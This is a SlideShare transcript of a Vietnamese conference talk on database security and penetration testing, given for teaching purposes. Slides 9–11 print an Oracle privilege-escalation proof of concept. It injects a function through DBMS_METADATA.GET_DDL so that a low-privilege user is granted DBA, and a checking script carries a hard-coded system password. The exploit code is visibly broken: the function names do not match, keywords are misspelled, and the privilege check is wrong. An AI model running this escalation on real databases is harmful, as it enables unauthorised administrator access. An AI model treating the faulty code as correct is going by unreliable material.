SlideShare a Scribd company logo
1 of 25
Download to read offline
DATABASE SECURITY

     Nguyễn Thanh Tùng
   Khoa Khoa học & Kỹ thuật Máy tính
    Đại học Bách khoa TPHCM
1                    29/12/2012
Nội dung
   Lỗ hổng bảo mật trong cơ sở dữ liệu
   Pentesting
   Mô hình Housing service provider
   Hiệu ứng phụ trong pentesting
2  SBS 2012                29/12/2012
Lỗ hổng bảo mật
   Lỗ hổng bảo mật (security flaw) là tập hợp những điều
   kiện mà cho phép một kẻ xấu tấn công làm vi phạm
   những chính sách bảo mật một cách tường minh hoặc
   ngầm.
3                          29/12/2012
Lỗ hổng bảo mật trong DBMS
   dbms_jvm_exp_perms
   owbrepos_owner.wb_olap_aw_remove_solve_id
   ctxsys.drvxtabc.Create_Tables
   sys.lt.CompressWorkspace
   sys.lt.MergeWorkspace
   sys.lt.RemoveWorkspace
   xdb.xdb_pitrig_pkg
   xdb.xdb_pitrig_pkg.pitrig_truncate
   xdb.xdb_pitrig_pkg.pitrig_drop
   dbms_assert
   …

4  SBS 2012                   29/12/2012
Phân loại lỗ hổng bảo mật CSDL

                        Database security
                           flaws


                                             Packages/
    System security
                   Users/Accounts      Privileges/Roles     Procedures/
      settings
                                             Functions

   Audit       System    Password    Account
                                  Roles  Privileges
  settings     configuration  policy    settings
5       SBS 2012                                  29/12/2012
Nội dung
   Lỗ hổng bảo mật trong cơ sở dữ liệu
   Pentesting
   Mô hình Housing service provider
   Hiệu ứng phụ trong pentesting
6  SBS 2012                29/12/2012
Pentesting
   Pentesting là một kỹ thuật giả lập sự tấn công nhằm
   đánh giá độ bảo mật của hệ thống máy tính, mạng,
   hoặc cơ sở dữ liệu.
   Phân tích hệ thống một cách chủ động để tìm ra bất kỳ
   điểm yếu, lỗ hổng về bảo mật.
   Người đặc tả pentesting như một kẻ tấn công thật sự để
   phân tích, khai thác những lỗ hổng bảo mật của hệ
   thống.
   Tấn công thành công chứng tỏ có lỗ hổng trong hệ
   thống và ngược lại.

7  SBS 2012                     29/12/2012
Phân loại pentesting
  Information base  Aggressiveness  Scope   Starting point


    Black box      Passive   Full     Inside


    White box     Cautious   Limited   Outside


    Grey box     Calculated  Focused


             Aggressive8    SBS 2012                    29/12/2012
Minh họa pentesting
   Tạo user giả lập tấn công
    create user NORMAL_USER identified by normaluser;
    grant CREATE SESSION to NORMAL_USER;
    grant CREATE PROCEDURE to NORMAL_USER;
    grant EXECUTE ON
    SYS.DBMS_METADATA.GET_DDL to
    NORMAL_USER;
9  SBS 2012                     29/12/2012
Minh họa pentesting
    Giả lập tấn công vào database orcl bằng tài khoản giả lập vừa tạo
    Connect Normal_user/normaluser@orcl;
    CREATE OR REPLACE FUNCTION "NORMAL_USER"."ATTACK_FUNC"
    return vachar2
    authid current_user as
    pragma autonomous_transaction;
    BEGIN
      EXECUTE IMMEDIATE 'GRANT DBA TO NORMAL_USER';
      COMMIT;
      RETURN '';
    END;
    /

    BEGIN
      SELECT SYS.DBMS_METADATA.GET_DDL('''||NORMAL_USER.ATTACKER_FUNC()||''','')
      FROM dual;
    END;
    /


10  SBS 2012                                29/12/2012
Minh họa pentesting
    Kiểm tra việc tấn công:
    connect system/adM1N27@orcl;
    declare
      num NUMBER;
    begin
      select count(*) into num from DBA_ROLE_PRIVS where granted_role = 'DBA'
      and grantee = 'NORMAL_USER';
      If (num > 1) Then
        DBMS_OUTPUT.PUTLINE('RISK AT DBMS_METADATA.GET_DDL()');
      END IF
    end;
    /
    Khôi phục lại trạng thái ban đầu:
    drop user NORMAL_USER CASCADE;
    exit;


11  SBS 2012                              29/12/2012
Các bước trong pentesting
   1     • Lập kế hoạch và chuẩn bị
   2     • Thu thập thông tin và phân tích
   3     • Xác định các lỗ hổng
   4     • Giả lập tấn công
   5     • Phân tích và báo cáo
   6     • Khôi phục trạng thái ban đầu

12  SBS 2012                    29/12/2012
Các bước trong Pentesting
                  2. Information gathering
                                        Developer
                         4. Penetration attempt

                 Scanning server
 Client
      1. Planning & Preparation
                       3. Vulnerability detection

                                      Target database


                             6. Cleaning up
   5. Analysis & Reporting

13   SBS 2012                               29/12/2012
14  SBS 2012  29/12/2012
Nội dung
    Lỗ hổng bảo mật trong cơ sở dữ liệu
    Pentesting
    Mô hình Housing service provider
    Hiệu ứng phụ trong pentesting
15  SBS 2012                29/12/2012
Mô hình Housing service provider
           Network
         <HTTP, SOAP, SSL>
                    Client A’ DB    Client B’ DB


                   Client A’s server  Client B’s server
   Client                Housing provider
16   SBS 2012                           29/12/2012
Nội dung
    Lỗ hổng bảo mật trong cơ sở dữ liệu
    Pentesting
    Mô hình Housing service provider
    Hiệu ứng phụ trong pentesting
17  SBS 2012                29/12/2012
Hiệu ứng phụ trong Pentesting
    Bảo mật thông tin trong cơ sở dữ liệu liên quan đến
    việc đảm bảo dữ liệu an toàn ở bốn khía cạnh sau:
                Database
                security
18  SBS 2012                     29/12/2012
Tính bí mật


           Information gathering
            Sensitive information:
     Pentester   IP address, port,
            Database name,…
                         Target database
19  SBS 2012                           29/12/2012
Tính toàn vẹn


                Pentesting


         Pentester
                      Object A                 Access

        Normal users20  SBS 2012                     29/12/2012
Tính sẵn sàng


              Pentesting

        Pentester
                Access  Target database
     Normal users21  SBS 2012                       29/12/2012
Tính chống thoái thác


              Pentesting


        Pentester
                     Object A
               Attack

        Hacker

22  SBS 2012                    29/12/2012
Nội dung
    Lỗ hổng bảo mật trong cơ sở dữ liệu
    Pentesting
    Mô hình Housing service provider
    Hiệu ứng phụ trong pentesting
23  SBS 2012                29/12/2012
Tài liệu tham khảo
     T.K. Dang, Q.C. Truong, P.H. Cu-Nguyen, T.Q.N. Tran, “An Extensible Framework for Detecting
     Database Systems Flaws”, ACOMP, Ho Chi Minh City, Vietnam, 2007.
     T.K. Dang, T.T. Nguyen, T.Q.N. Tran, Q.C. Truong.: “Security Issues in Housing Service Outsourcing
     Model with Database Systems. Technical Report”, http://www.cse.hcmut.edu.vn/~asis, 2010.
     T.Q.N. Tran, T.K. Dang, “Towards Side-Effects-free Database Penetration Testing”, Journal of
     Wireless Mobile Networks, Ubiquitous Computing, and Dependable Applications, ISSN 2093-5374,
     1(1), 72-85, June 2010.
     R. B. Natan, “How to Secure and Audit Oracle 10g, 11g”, Auerbach Publications, 2009.
     D. Knox, “Effective Oracle Database 10g Security by Design”, Oracle Press, 2004.
     L.      David,     A.     Chris,     H.      John,     G.     Bill,
     “The Database Hacker’s Handbook: Defending Database Servers”, Wiley Publishing, 2005.
     J.P. McDermot: “Attack Net Penetration Testing”. Proceedings of the workshop on new security
     paradigms 2000
     O. M. Dahl, “Using Coloured Petri Nets in Penetration Testing”, Master’s thesis, Gjovik University
     College, 2005
     S. Noel, L. Wang, A. Singhal, S. Jajodia, “Measuring Security Risk of Networks Using Attack
     Graphs”, International Journal of Next-Generation Computing, Vol. 1, No. 1, 135-147, 2010
24  SBS 2012                                          29/12/2012
Thank you
         Q&A


25  SBS 2012        29/12/2012

More Related Content

What's hot

SBC 2012 - Lỗ hổng trong cài đặt giao thức OAuth và nguy cơ với người dùng (N...
SBC 2012 - Lỗ hổng trong cài đặt giao thức OAuth và nguy cơ với người dùng (N...SBC 2012 - Lỗ hổng trong cài đặt giao thức OAuth và nguy cơ với người dùng (N...
SBC 2012 - Lỗ hổng trong cài đặt giao thức OAuth và nguy cơ với người dùng (N...Security Bootcamp
 
SBC 2012 - Windows Security (Lương Trung Thành)
SBC 2012 - Windows Security (Lương Trung Thành)SBC 2012 - Windows Security (Lương Trung Thành)
SBC 2012 - Windows Security (Lương Trung Thành)Security Bootcamp
 
SBC 2012 - Penetration Testting với Backtrack 5 (Nguyễn Phương Trường Anh + N...
SBC 2012 - Penetration Testting với Backtrack 5 (Nguyễn Phương Trường Anh + N...SBC 2012 - Penetration Testting với Backtrack 5 (Nguyễn Phương Trường Anh + N...
SBC 2012 - Penetration Testting với Backtrack 5 (Nguyễn Phương Trường Anh + N...Security Bootcamp
 
SBC 2012 - Information Gathering (Lương Trung Thành)
SBC 2012 - Information Gathering (Lương Trung Thành)SBC 2012 - Information Gathering (Lương Trung Thành)
SBC 2012 - Information Gathering (Lương Trung Thành)Security Bootcamp
 
SBC 2012 - Tổng quan về bảo mật trong Cloud (Lê Vĩnh Đạt)
SBC 2012 - Tổng quan về bảo mật trong Cloud (Lê Vĩnh Đạt)SBC 2012 - Tổng quan về bảo mật trong Cloud (Lê Vĩnh Đạt)
SBC 2012 - Tổng quan về bảo mật trong Cloud (Lê Vĩnh Đạt)Security Bootcamp
 
Trần Anh Khoa - Kautilya và Powershell trong kỹ thuật tấn công tiếp cận
Trần Anh Khoa - Kautilya và Powershelltrong kỹ thuật tấn công tiếp cậnTrần Anh Khoa - Kautilya và Powershelltrong kỹ thuật tấn công tiếp cận
Trần Anh Khoa - Kautilya và Powershell trong kỹ thuật tấn công tiếp cậnSecurity Bootcamp
 
Security Bootcamp 2013 penetration testing (basic)
Security Bootcamp 2013  penetration testing (basic)Security Bootcamp 2013  penetration testing (basic)
Security Bootcamp 2013 penetration testing (basic)Security Bootcamp
 
SBC 2012 - Software Exploitation (Nguyễn Chấn Việt)
SBC 2012 - Software Exploitation (Nguyễn Chấn Việt)SBC 2012 - Software Exploitation (Nguyễn Chấn Việt)
SBC 2012 - Software Exploitation (Nguyễn Chấn Việt)Security Bootcamp
 
XXE injection - Nguyễn Tăng Hưng
XXE injection - Nguyễn Tăng HưngXXE injection - Nguyễn Tăng Hưng
XXE injection - Nguyễn Tăng HưngVõ Thái Lâm
 
Security Bootcamp 2013 - Giải pháp phát hiện xâm nhập mạng không dây - WIDS -...
Security Bootcamp 2013 - Giải pháp phát hiện xâm nhập mạng không dây - WIDS -...Security Bootcamp 2013 - Giải pháp phát hiện xâm nhập mạng không dây - WIDS -...
Security Bootcamp 2013 - Giải pháp phát hiện xâm nhập mạng không dây - WIDS -...Security Bootcamp
 
Nghien cuu ma nguon mo openvpn
Nghien cuu ma nguon mo openvpnNghien cuu ma nguon mo openvpn
Nghien cuu ma nguon mo openvpnpeterh18
 

What's hot (11)

SBC 2012 - Lỗ hổng trong cài đặt giao thức OAuth và nguy cơ với người dùng (N...
SBC 2012 - Lỗ hổng trong cài đặt giao thức OAuth và nguy cơ với người dùng (N...SBC 2012 - Lỗ hổng trong cài đặt giao thức OAuth và nguy cơ với người dùng (N...
SBC 2012 - Lỗ hổng trong cài đặt giao thức OAuth và nguy cơ với người dùng (N...
 
SBC 2012 - Windows Security (Lương Trung Thành)
SBC 2012 - Windows Security (Lương Trung Thành)SBC 2012 - Windows Security (Lương Trung Thành)
SBC 2012 - Windows Security (Lương Trung Thành)
 
SBC 2012 - Penetration Testting với Backtrack 5 (Nguyễn Phương Trường Anh + N...
SBC 2012 - Penetration Testting với Backtrack 5 (Nguyễn Phương Trường Anh + N...SBC 2012 - Penetration Testting với Backtrack 5 (Nguyễn Phương Trường Anh + N...
SBC 2012 - Penetration Testting với Backtrack 5 (Nguyễn Phương Trường Anh + N...
 
SBC 2012 - Information Gathering (Lương Trung Thành)
SBC 2012 - Information Gathering (Lương Trung Thành)SBC 2012 - Information Gathering (Lương Trung Thành)
SBC 2012 - Information Gathering (Lương Trung Thành)
 
SBC 2012 - Tổng quan về bảo mật trong Cloud (Lê Vĩnh Đạt)
SBC 2012 - Tổng quan về bảo mật trong Cloud (Lê Vĩnh Đạt)SBC 2012 - Tổng quan về bảo mật trong Cloud (Lê Vĩnh Đạt)
SBC 2012 - Tổng quan về bảo mật trong Cloud (Lê Vĩnh Đạt)
 
Trần Anh Khoa - Kautilya và Powershell trong kỹ thuật tấn công tiếp cận
Trần Anh Khoa - Kautilya và Powershelltrong kỹ thuật tấn công tiếp cậnTrần Anh Khoa - Kautilya và Powershelltrong kỹ thuật tấn công tiếp cận
Trần Anh Khoa - Kautilya và Powershell trong kỹ thuật tấn công tiếp cận
 
Security Bootcamp 2013 penetration testing (basic)
Security Bootcamp 2013  penetration testing (basic)Security Bootcamp 2013  penetration testing (basic)
Security Bootcamp 2013 penetration testing (basic)
 
SBC 2012 - Software Exploitation (Nguyễn Chấn Việt)
SBC 2012 - Software Exploitation (Nguyễn Chấn Việt)SBC 2012 - Software Exploitation (Nguyễn Chấn Việt)
SBC 2012 - Software Exploitation (Nguyễn Chấn Việt)
 
XXE injection - Nguyễn Tăng Hưng
XXE injection - Nguyễn Tăng HưngXXE injection - Nguyễn Tăng Hưng
XXE injection - Nguyễn Tăng Hưng
 
Security Bootcamp 2013 - Giải pháp phát hiện xâm nhập mạng không dây - WIDS -...
Security Bootcamp 2013 - Giải pháp phát hiện xâm nhập mạng không dây - WIDS -...Security Bootcamp 2013 - Giải pháp phát hiện xâm nhập mạng không dây - WIDS -...
Security Bootcamp 2013 - Giải pháp phát hiện xâm nhập mạng không dây - WIDS -...
 
Nghien cuu ma nguon mo openvpn
Nghien cuu ma nguon mo openvpnNghien cuu ma nguon mo openvpn
Nghien cuu ma nguon mo openvpn
 

More from Security Bootcamp

Ransomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdfRansomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdfSecurity Bootcamp
 
Hieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecurityHieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecuritySecurity Bootcamp
 
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s viewNguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s viewSecurity Bootcamp
 
Sbc 2020 bao gio vn co anm dua vao cong nghe mo
Sbc 2020 bao gio vn co anm dua vao cong nghe moSbc 2020 bao gio vn co anm dua vao cong nghe mo
Sbc 2020 bao gio vn co anm dua vao cong nghe moSecurity Bootcamp
 
Giam sat thu dong thong tin an toan hang hai su dung sdr
Giam sat thu dong thong tin an toan hang hai su dung sdrGiam sat thu dong thong tin an toan hang hai su dung sdr
Giam sat thu dong thong tin an toan hang hai su dung sdrSecurity Bootcamp
 
Insider threat-what-us-do d-want
Insider threat-what-us-do d-wantInsider threat-what-us-do d-want
Insider threat-what-us-do d-wantSecurity Bootcamp
 
Macro malware common techniques - public
Macro malware  common techniques - publicMacro malware  common techniques - public
Macro malware common techniques - publicSecurity Bootcamp
 
Malware detection-using-machine-learning
Malware detection-using-machine-learningMalware detection-using-machine-learning
Malware detection-using-machine-learningSecurity Bootcamp
 
Tim dieu moi trong nhung dieu cu
Tim dieu moi trong nhung dieu cuTim dieu moi trong nhung dieu cu
Tim dieu moi trong nhung dieu cuSecurity Bootcamp
 
Threat detection with 0 cost
Threat detection with 0 costThreat detection with 0 cost
Threat detection with 0 costSecurity Bootcamp
 
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active DirectoryGOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active DirectorySecurity Bootcamp
 
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018Security Bootcamp
 
Lannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksLannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksSecurity Bootcamp
 
Letrungnghia-gopyluananm2018
Letrungnghia-gopyluananm2018Letrungnghia-gopyluananm2018
Letrungnghia-gopyluananm2018Security Bootcamp
 

More from Security Bootcamp (20)

Ransomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdfRansomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdf
 
Hieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecurityHieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecurity
 
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s viewNguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
 
Sbc 2020 bao gio vn co anm dua vao cong nghe mo
Sbc 2020 bao gio vn co anm dua vao cong nghe moSbc 2020 bao gio vn co anm dua vao cong nghe mo
Sbc 2020 bao gio vn co anm dua vao cong nghe mo
 
Deception change-the-game
Deception change-the-gameDeception change-the-game
Deception change-the-game
 
Giam sat thu dong thong tin an toan hang hai su dung sdr
Giam sat thu dong thong tin an toan hang hai su dung sdrGiam sat thu dong thong tin an toan hang hai su dung sdr
Giam sat thu dong thong tin an toan hang hai su dung sdr
 
Sbc2019 luong-cyber startup
Sbc2019 luong-cyber startupSbc2019 luong-cyber startup
Sbc2019 luong-cyber startup
 
Insider threat-what-us-do d-want
Insider threat-what-us-do d-wantInsider threat-what-us-do d-want
Insider threat-what-us-do d-want
 
Macro malware common techniques - public
Macro malware  common techniques - publicMacro malware  common techniques - public
Macro malware common techniques - public
 
Malware detection-using-machine-learning
Malware detection-using-machine-learningMalware detection-using-machine-learning
Malware detection-using-machine-learning
 
Tim dieu moi trong nhung dieu cu
Tim dieu moi trong nhung dieu cuTim dieu moi trong nhung dieu cu
Tim dieu moi trong nhung dieu cu
 
Threat detection with 0 cost
Threat detection with 0 costThreat detection with 0 cost
Threat detection with 0 cost
 
Build SOC
Build SOC Build SOC
Build SOC
 
AD red vs blue
AD red vs blueAD red vs blue
AD red vs blue
 
Securitybox
SecurityboxSecuritybox
Securitybox
 
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active DirectoryGOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
 
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
 
Api security-present
Api security-presentApi security-present
Api security-present
 
Lannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksLannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber Attacks
 
Letrungnghia-gopyluananm2018
Letrungnghia-gopyluananm2018Letrungnghia-gopyluananm2018
Letrungnghia-gopyluananm2018
 

SBC 2012 - Database Security (Nguyễn Thanh Tùng)

 • 1. DATABASE SECURITY Nguyễn Thanh Tùng Khoa Khoa học & Kỹ thuật Máy tính Đại học Bách khoa TPHCM 1 29/12/2012
 • 2. Nội dung  Lỗ hổng bảo mật trong cơ sở dữ liệu  Pentesting  Mô hình Housing service provider  Hiệu ứng phụ trong pentesting 2 SBS 2012 29/12/2012
 • 3. Lỗ hổng bảo mật  Lỗ hổng bảo mật (security flaw) là tập hợp những điều kiện mà cho phép một kẻ xấu tấn công làm vi phạm những chính sách bảo mật một cách tường minh hoặc ngầm. 3 29/12/2012
 • 4. Lỗ hổng bảo mật trong DBMS  dbms_jvm_exp_perms  owbrepos_owner.wb_olap_aw_remove_solve_id  ctxsys.drvxtabc.Create_Tables  sys.lt.CompressWorkspace  sys.lt.MergeWorkspace  sys.lt.RemoveWorkspace  xdb.xdb_pitrig_pkg  xdb.xdb_pitrig_pkg.pitrig_truncate  xdb.xdb_pitrig_pkg.pitrig_drop  dbms_assert  … 4 SBS 2012 29/12/2012
 • 5. Phân loại lỗ hổng bảo mật CSDL Database security flaws Packages/ System security Users/Accounts Privileges/Roles Procedures/ settings Functions Audit System Password Account Roles Privileges settings configuration policy settings 5 SBS 2012 29/12/2012
 • 6. Nội dung  Lỗ hổng bảo mật trong cơ sở dữ liệu  Pentesting  Mô hình Housing service provider  Hiệu ứng phụ trong pentesting 6 SBS 2012 29/12/2012
 • 7. Pentesting  Pentesting là một kỹ thuật giả lập sự tấn công nhằm đánh giá độ bảo mật của hệ thống máy tính, mạng, hoặc cơ sở dữ liệu.  Phân tích hệ thống một cách chủ động để tìm ra bất kỳ điểm yếu, lỗ hổng về bảo mật.  Người đặc tả pentesting như một kẻ tấn công thật sự để phân tích, khai thác những lỗ hổng bảo mật của hệ thống.  Tấn công thành công chứng tỏ có lỗ hổng trong hệ thống và ngược lại. 7 SBS 2012 29/12/2012
 • 8. Phân loại pentesting Information base Aggressiveness Scope Starting point Black box Passive Full Inside White box Cautious Limited Outside Grey box Calculated Focused Aggressive 8 SBS 2012 29/12/2012
 • 9. Minh họa pentesting  Tạo user giả lập tấn công create user NORMAL_USER identified by normaluser; grant CREATE SESSION to NORMAL_USER; grant CREATE PROCEDURE to NORMAL_USER; grant EXECUTE ON SYS.DBMS_METADATA.GET_DDL to NORMAL_USER; 9 SBS 2012 29/12/2012
 • 10. Minh họa pentesting  Giả lập tấn công vào database orcl bằng tài khoản giả lập vừa tạo Connect Normal_user/normaluser@orcl; CREATE OR REPLACE FUNCTION "NORMAL_USER"."ATTACK_FUNC" return vachar2 authid current_user as pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO NORMAL_USER'; COMMIT; RETURN ''; END; / BEGIN SELECT SYS.DBMS_METADATA.GET_DDL('''||NORMAL_USER.ATTACKER_FUNC()||''','') FROM dual; END; / 10 SBS 2012 29/12/2012
 • 11. Minh họa pentesting  Kiểm tra việc tấn công: connect system/adM1N27@orcl; declare num NUMBER; begin select count(*) into num from DBA_ROLE_PRIVS where granted_role = 'DBA' and grantee = 'NORMAL_USER'; If (num > 1) Then DBMS_OUTPUT.PUTLINE('RISK AT DBMS_METADATA.GET_DDL()'); END IF end; /  Khôi phục lại trạng thái ban đầu: drop user NORMAL_USER CASCADE; exit; 11 SBS 2012 29/12/2012
 • 12. Các bước trong pentesting 1 • Lập kế hoạch và chuẩn bị 2 • Thu thập thông tin và phân tích 3 • Xác định các lỗ hổng 4 • Giả lập tấn công 5 • Phân tích và báo cáo 6 • Khôi phục trạng thái ban đầu 12 SBS 2012 29/12/2012
 • 13. Các bước trong Pentesting 2. Information gathering Developer 4. Penetration attempt Scanning server Client 1. Planning & Preparation 3. Vulnerability detection Target database 6. Cleaning up 5. Analysis & Reporting 13 SBS 2012 29/12/2012
 • 14. 14 SBS 2012 29/12/2012
 • 15. Nội dung  Lỗ hổng bảo mật trong cơ sở dữ liệu  Pentesting  Mô hình Housing service provider  Hiệu ứng phụ trong pentesting 15 SBS 2012 29/12/2012
 • 16. Mô hình Housing service provider Network <HTTP, SOAP, SSL> Client A’ DB Client B’ DB Client A’s server Client B’s server Client Housing provider 16 SBS 2012 29/12/2012
 • 17. Nội dung  Lỗ hổng bảo mật trong cơ sở dữ liệu  Pentesting  Mô hình Housing service provider  Hiệu ứng phụ trong pentesting 17 SBS 2012 29/12/2012
 • 18. Hiệu ứng phụ trong Pentesting  Bảo mật thông tin trong cơ sở dữ liệu liên quan đến việc đảm bảo dữ liệu an toàn ở bốn khía cạnh sau: Database security 18 SBS 2012 29/12/2012
 • 19. Tính bí mật Information gathering Sensitive information: Pentester IP address, port, Database name,… Target database 19 SBS 2012 29/12/2012
 • 20. Tính toàn vẹn Pentesting Pentester Object A Access Normal users 20 SBS 2012 29/12/2012
 • 21. Tính sẵn sàng Pentesting Pentester Access Target database Normal users 21 SBS 2012 29/12/2012
 • 22. Tính chống thoái thác Pentesting Pentester Object A Attack Hacker 22 SBS 2012 29/12/2012
 • 23. Nội dung  Lỗ hổng bảo mật trong cơ sở dữ liệu  Pentesting  Mô hình Housing service provider  Hiệu ứng phụ trong pentesting 23 SBS 2012 29/12/2012
 • 24. Tài liệu tham khảo  T.K. Dang, Q.C. Truong, P.H. Cu-Nguyen, T.Q.N. Tran, “An Extensible Framework for Detecting Database Systems Flaws”, ACOMP, Ho Chi Minh City, Vietnam, 2007.  T.K. Dang, T.T. Nguyen, T.Q.N. Tran, Q.C. Truong.: “Security Issues in Housing Service Outsourcing Model with Database Systems. Technical Report”, http://www.cse.hcmut.edu.vn/~asis, 2010.  T.Q.N. Tran, T.K. Dang, “Towards Side-Effects-free Database Penetration Testing”, Journal of Wireless Mobile Networks, Ubiquitous Computing, and Dependable Applications, ISSN 2093-5374, 1(1), 72-85, June 2010.  R. B. Natan, “How to Secure and Audit Oracle 10g, 11g”, Auerbach Publications, 2009.  D. Knox, “Effective Oracle Database 10g Security by Design”, Oracle Press, 2004.  L. David, A. Chris, H. John, G. Bill, “The Database Hacker’s Handbook: Defending Database Servers”, Wiley Publishing, 2005.  J.P. McDermot: “Attack Net Penetration Testing”. Proceedings of the workshop on new security paradigms 2000  O. M. Dahl, “Using Coloured Petri Nets in Penetration Testing”, Master’s thesis, Gjovik University College, 2005  S. Noel, L. Wang, A. Singhal, S. Jajodia, “Measuring Security Risk of Networks Using Attack Graphs”, International Journal of Next-Generation Computing, Vol. 1, No. 1, 135-147, 2010 24 SBS 2012 29/12/2012
 • 25. Thank you Q&A 25 SBS 2012 29/12/2012